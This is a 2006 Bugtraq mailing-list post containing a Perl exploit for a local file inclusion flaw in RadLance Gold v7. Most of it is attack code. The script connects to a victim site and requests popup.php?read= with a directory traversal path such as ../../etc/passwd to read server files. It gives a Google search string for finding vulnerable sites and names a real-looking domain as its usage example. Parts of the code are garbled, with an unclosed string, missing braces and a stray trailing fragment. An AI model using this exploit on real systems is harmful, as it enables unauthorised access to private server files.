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RadLance Local Inclusion Exploit
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: RadLance Local Inclusion Exploit
- From: "Hussain Salim" <bo_ali90@xxxxxxxxxxx>
- Date: Sun, 14 May 2006 11:39:37 +0000
Discovered And Coded By Mr.CrackerZ
Exploit Code
#Discovered and coded by Mr.CrackerZ ( Security Team )
#Contact me ( bo_ali90@xxxxxxxxxxx )
#Usage: radlance.pl <victim> <local file to read>
#Google: Powered by: RadLance Gold v7
#Tested Under RadLance Gold v7 ( Local Inclusion Exploit )
#Perl example: radlance.pl www.getabuilder.co.uk
use IO::Socket;
if(@ARGV < 2){
print "
Exploit Discovered and coded by Mr.CrackerZ ( Security Team )
radlance.pl <victim> <local file to read>
<victim> = www.example.com
<local file to read> = ../../../../../../../../../etc/passwd
#Local variables
$wbbserver = $ARGV[0];
$wbbserver =~ s/(http:\/\/)//eg;
$wbbhost = "http://".$wbbserver;
$port = "80";
$wbbtar = "/popup.php?read=";
$wbbxp = $ARGV[1];
$wbbreq = $wbbhost.$wbbtar.$wbbxp;
#Writing data to socket
print "\r\n";
print "+ Trying to connect: $wbbserver\n";
$wbb = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$wbbserver",
PeerPort => "$port") || die "\n+ Connection failed...\n";
print $wbb "GET $wbbreq\n";
print $wbb "Host: $wbbserver\n";
print $wbb "Accept: */*\n";
print $wbb "Connection: close\n\n";
print "+ Connected!...\n";
print "\r\n";
while($answer = <$wbb>) {
print <$wbb>;
printf "\r\n";
the code and save it as .html or .php depend the file u are trying
to\naccess to , and if u saw the file cont so you got what u need :)\n";
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